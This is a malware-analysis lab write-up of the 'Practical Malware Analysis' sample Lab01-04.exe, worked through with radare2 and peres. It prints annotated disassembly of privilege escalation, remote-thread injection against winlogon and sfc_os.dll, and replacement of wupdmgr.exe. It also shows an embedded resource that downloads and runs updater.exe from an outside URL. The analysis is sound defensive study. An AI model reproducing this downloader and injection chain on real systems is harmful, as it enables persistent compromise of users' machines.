Name: Win.Trojan.Agent-375080
No packaging. Compiled and linked by MS VC++ 6.0 Compilation timestamp From header
#rabin2 -h lab1-4.exe
PE file header:
IMAGE_NT_HEADERS
Signature : 0x4550
IMAGE_FILE_HEADERS
Machine : 0x14c
NumberOfSections : 0x4
TimeDateStamp : 0x5d69a2b3
PointerToSymbolTable : 0x0
NumberOfSymbols : 0x0
SizeOfOptionalHeader : 0xe0
Characteristics : 0x10f>>>from datetime import datetime
>>>datetime.fromtimestamp(int('0x5d69a2b3', 16))
datetime.datetime(2019, 8, 31, 0, 26, 59)TS: 2019-8-31 0:26:59
[0x004015cf]> ii
[Imports]
1 0x00402010 NONE FUNC KERNEL32.dll_GetProcAddress
2 0x00402014 NONE FUNC KERNEL32.dll_LoadLibraryA
3 0x00402018 NONE FUNC KERNEL32.dll_WinExec
4 0x0040201c NONE FUNC KERNEL32.dll_WriteFile
5 0x00402020 NONE FUNC KERNEL32.dll_CreateFileA
6 0x00402024 NONE FUNC KERNEL32.dll_SizeofResource
7 0x00402028 NONE FUNC KERNEL32.dll_CreateRemoteThread
8 0x0040202c NONE FUNC KERNEL32.dll_FindResourceA
9 0x00402030 NONE FUNC KERNEL32.dll_GetModuleHandleA
10 0x00402034 NONE FUNC KERNEL32.dll_GetWindowsDirectoryA
11 0x00402038 NONE FUNC KERNEL32.dll_MoveFileA
12 0x0040203c NONE FUNC KERNEL32.dll_GetTempPathA
13 0x00402040 NONE FUNC KERNEL32.dll_GetCurrentProcess
14 0x00402044 NONE FUNC KERNEL32.dll_OpenProcess
15 0x00402048 NONE FUNC KERNEL32.dll_CloseHandle
16 0x0040204c NONE FUNC KERNEL32.dll_LoadResource
1 0x00402000 NONE FUNC ADVAPI32.dll_OpenProcessToken
2 0x00402004 NONE FUNC ADVAPI32.dll_LookupPrivilegeValueA
3 0x00402008 NONE FUNC ADVAPI32.dll_AdjustTokenPrivileges
1 0x00402054 NONE FUNC MSVCRT.dll__snprintf
2 0x00402058 NONE FUNC MSVCRT.dll__exit
3 0x0040205c NONE FUNC MSVCRT.dll__XcptFilter
4 0x00402060 NONE FUNC MSVCRT.dll_exit
5 0x00402064 NONE FUNC MSVCRT.dll___p___initenv
6 0x00402068 NONE FUNC MSVCRT.dll___getmainargs
7 0x0040206c NONE FUNC MSVCRT.dll__initterm
8 0x00402070 NONE FUNC MSVCRT.dll___setusermatherr
9 0x00402074 NONE FUNC MSVCRT.dll__adjust_fdiv
10 0x00402078 NONE FUNC MSVCRT.dll___p__commode
11 0x0040207c NONE FUNC MSVCRT.dll___p__fmode
12 0x00402080 NONE FUNC MSVCRT.dll___set_app_type
13 0x00402084 NONE FUNC MSVCRT.dll__except_handler3
14 0x00402088 NONE FUNC MSVCRT.dll__controlfp
15 0x0040208c NONE FUNC MSVCRT.dll__stricmp
It contains process creation, library loading, file copying and exec() call
Total functions:
[0x004015cf]> afl
0x00401000 7 252 sub.winlogon.exe_0
0x004010fc 6 120 sub.KERNEL32.dll_GetCurrentProcess_fc
0x00401174 6 136 sub.SeDebugPrivilege_174
0x004011fc 1 340 sub.KERNEL32.dll_GetWindowsDirectoryA_1fc
0x00401350 19 589 sub.EnumProcessModules_350
0x004015a0 3 47 fcn.004015a0
0x004015cf 3 260 entry0
0x004016e0 1 6 sub.MSVCRT.dll__XcptFilter_6e0
0x004016e6 1 6 sub.MSVCRT.dll__initterm_6e6
0x004016ec 1 18 fcn.004016ec
0x00401701 1 1 fcn.00401701
0x00401716 1 6 sub.MSVCRT.dll__controlfp_716
After win initialisation in entry0 it calls 0x00401350 sub.EnumProcessModules_350()
In the beginning it will load external dll (psapi.dll) - processes status management library and then will call GetProcAddress()
| 0x004013aa 6878304000 push str.EnumProcessModules ; 0x403078 ; "EnumProcessModules"
| 0x004013af 688c304000 push 0x40308c ; "psapi.dll"
| 0x004013b4 ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
| 0x004013ba 50 push eax
| 0x004013bb ff1510204000 call dword [sym.imp.KERNEL32.dll_GetProcAddress] ; 0x402010
Then it will call LoadLibrary() one more time (not sure, but it seems like it will try replace the dll with patched library, probably from the resource):
0x004013dd a328314000 mov dword [0x403128], eax ; [0x403128:4]=0
| 0x004013e2 68b8304000 push str.EnumProcesses ; 0x4030b8 ; "EnumProcesses"
| 0x004013e7 68c8304000 push str.psapi.dll ; 0x4030c8 ; "psapi.dll"
| 0x004013ec ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
| 0x004013f2 50 push eax
| 0x004013f3 ff1510204000 call dword [sym.imp.KERNEL32.dll_GetProcAddress] ; 0x402010After some calculations it will call internal function for library patching:
| |:||| 0x004014a3 e858fbffff call sub.winlogon.exe_0
This function will Call OpenProcess() for winlogon.exe, do some additial command and call strcmp()
Then it will call next function sub.SeDebugPrivilege_174
| |`-> 0x004011a1 6a02 push 2 ; 2
| | 0x004011a3 6840304000 push str.sfc_os.dll ; 0x403040 ; "sfc_os.dll"
| | 0x004011a8 ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
....
....
| | 0x004011c5 ff1544204000 call dword [sym.imp.KERNEL32.dll_OpenProcess] ; 0x402044
....
....
| || 0x004011ed ff1528204000 call dword [sym.imp.KERNEL32.dll_CreateRemoteThread] ; 0x402028In this function it will Load library sfc_os.dll, call OpenProcess() and then register remote thread.
In the end of EnumProcessModules() it will work with some files and copy new file \\winup.exe
| || | 0x004014eb e884fcffff call sub.SeDebugPrivilege_174
| || | 0x004014f0 83c404 add esp, 4
| || | 0x004014f3 8985d0edffff mov dword [local_1230h], eax
| || | 0x004014f9 83bdd0edffff. cmp dword [local_1230h], 0
| ||,==< 0x00401500 0f848d000000 je 0x401593
| |||| 0x00401506 680e010000 push 0x10e ; 270
| |||| 0x0040150b 8d95dcfdffff lea edx, dword [local_224h]
| |||| 0x00401511 52 push edx
| |||| 0x00401512 ff1534204000 call dword [sym.imp.KERNEL32.dll_GetWindowsDirectoryA] ; 0x402034 ; "Z\""
| |||| 0x00401518 68d4304000 push str.system32__wupdmgr.exe ; 0x4030d4 ; "\\system32\\wupdmgr.exe"
....
| |||| 0x00401550 68f4304000 push 0x4030f4 ; "\\winup.exe"
| |||| 0x00401555 8d85f0feffff lea eax, dword [local_110h]
| |||| 0x0040155b 50 push eax
| |||| 0x0040155c 6800314000 push 0x403100 ; "%s%s"
| |||| 0x00401561 680e010000 push 0x10e ; 270
| |||| 0x00401566 8d8db8ecffff lea ecx, dword [local_1348h]
| |||| 0x0040156c 51 push ecx
| |||| 0x0040156d ff1554204000 call dword [sym.imp.MSVCRT.dll__snprintf] ; 0x402054
| |||| 0x00401573 83c414 add esp, 0x14
| |||| 0x00401576 8d95b8ecffff lea edx, dword [local_1348h]
| |||| 0x0040157c 52 push edx
| |||| 0x0040157d 8d85a8ebffff lea eax, dword [local_1458h]
| |||| 0x00401583 50 push eax
| |||| 0x00401584 ff1538204000 call dword [sym.imp.KERNEL32.dll_MoveFileA] ; 0x402038 ; "r\""
File contains resource 16k size
[0x004015cf]> iR
Resource 0
name: 101
timestamp: Thu Jan 1 01:00:00 1970
vaddr: 0x00404060
size: 16K
type: UNKNOWN
language: LANG_ENGLISH
Resource extraction tool: peres
#sudo apr-get install pev
...
#peres -a Lab01-04.exe
Node Type / Level: Resource Directory / 1
Characteristics: 0
Timestamp: 0
Major Version: 0
Minor Version: 0
Named entries: 1
Id entries: 0
...
Total Data Entry: 1
Save On: resources/101.bin
Then we can do the r2 analysis on 101.bin file
It contains some additional functions and contains windows function in imports
#r2 resource/101.bin
>>>aaa
>>>afl
0x00401000 3 299 sub.KERNEL32.dll_GetTempPathA_0
0x0040112c 1 6 sub.urlmon.dll_URLDownloadToFileA_12c
0x00401132 3 260 entry0
0x00401242 1 6 sub.MSVCRT.dll__XcptFilter_242
0x00401248 1 6 sub.MSVCRT.dll__initterm_248
0x0040124e 1 18 fcn.0040124e
0x00401263 1 1 fcn.00401263
0x00401276 1 6 sub.MSVCRT.dll__controlfp_276
>>>ii
[Imports]
1 0x00402000 NONE FUNC KERNEL32.dll_WinExec
2 0x00402004 NONE FUNC KERNEL32.dll_GetTempPathA
3 0x00402008 NONE FUNC KERNEL32.dll_GetWindowsDirectoryA
1 0x0040204c NONE FUNC urlmon.dll_URLDownloadToFileA
1 0x00402010 NONE FUNC MSVCRT.dll__controlfp
2 0x00402014 NONE FUNC MSVCRT.dll__snprintf
3 0x00402018 NONE FUNC MSVCRT.dll__exit
4 0x0040201c NONE FUNC MSVCRT.dll__XcptFilter
5 0x00402020 NONE FUNC MSVCRT.dll_exit
6 0x00402024 NONE FUNC MSVCRT.dll___p___initenv
7 0x00402028 NONE FUNC MSVCRT.dll___getmainargs
8 0x0040202c NONE FUNC MSVCRT.dll__initterm
9 0x00402030 NONE FUNC MSVCRT.dll___setusermatherr
10 0x00402034 NONE FUNC MSVCRT.dll__adjust_fdiv
11 0x00402038 NONE FUNC MSVCRT.dll___p__commode
12 0x0040203c NONE FUNC MSVCRT.dll___p__fmode
13 0x00402040 NONE FUNC MSVCRT.dll___set_app_type
14 0x00402044 NONE FUNC MSVCRT.dll__except_handler3
The most interesting import is KERNEL32.dll_WinExec() - it's used for additional exec in the main programm.
DLL function will download and run additional file updater.exe from external URL:
| 0x004010ec 83c414 add esp, 0x14
| 0x004010ef 6a00 push 0
| 0x004010f1 6a00 push 0
| 0x004010f3 8d8dc0fbffff lea ecx, dword [local_440h]
| 0x004010f9 51 push ecx
| 0x004010fa 6844304000 push str.http:__www.practicalmalwareanalysis.com_updater.exe ; 0x403044 ; "http://www.practicalmalwareanalysis.com/updater.exe"
| 0x004010ff 6a00 push 0
| 0x00401101 e826000000 call sub.urlmon.dll_URLDownloadToFileA_12cConclusion
This software will create fake dll in the system and register the "thread" outside of the process. It will dump internal dll that will download and run external file http://www.practicalmalwareanalysis.com/updater.exe
It's typical tryjan downloader.